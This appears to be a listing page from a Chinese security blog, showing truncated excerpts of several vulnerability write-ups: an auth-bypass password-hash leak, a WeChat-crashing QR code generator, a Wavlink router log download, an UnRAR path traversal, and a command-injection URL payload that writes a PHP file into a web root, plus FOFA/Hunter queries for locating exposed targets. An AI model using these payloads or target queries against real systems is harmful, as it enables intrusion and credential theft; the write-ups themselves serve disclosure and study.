主要关注网络安全方面的技术、知识和趋势,旨在为网络安全行业的发展做出贡献。
漏洞成因没有对接口进行严格的权限管理,导致可以通过访问user_getUserInfoByUserName.action获取system用户的MD5加密后的密码hunter语法web.icon="4644f2d45601037b8423d45e13194c93"&&web.title="智慧园区综合管理平台"POCGET /admin/user_get… 漏洞成因 没有对接口进行严格的权限管理,导致可以通过访问user_getUserInfoByUserName.action获取system用户的MD5加密后的密码 hunter语法 web.icon="4644f2d45601037b8423d45e13194c93"&&web.title="智慧园区综合管理平台" POC
注:代码可能带有破坏性,仅用于学习,分析用途。微信崩溃了?微信最新版二维码Bug,不知道问题在哪里。使用下面代码,轻松帮你复现。安装qrcodepip isntall qrcode 生成代码: import qrcode from qrcode.util import QRData, MODE_NUMBER, MODE_8BIT_BYTE def nvwu_put(self, num, length): if …
漏洞说明Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题,未经验证的攻击者可以下载日志文件和配置数据。影响版本Wavlink WN530HG4 M30HG4.V5030.191116漏洞复现fofa:title="Wi-Fi APP Login"payload:/cgi-bin/ExportL…
某信-上网行为管理系统一句话/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0aBase64 版/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20PD9waH…
1. 描述UnRAR二进制文件中的路径遍历漏洞(CVE-2022-30333) 在github 公布项目poc中(地址:https://github.com/TheL1ghtVn/CVE-2022-30333-PoC),存在rar的poc。 通过winhex打开可见,一个rar中存在俩个同名为,sym的文件夹查询资料,得到构造…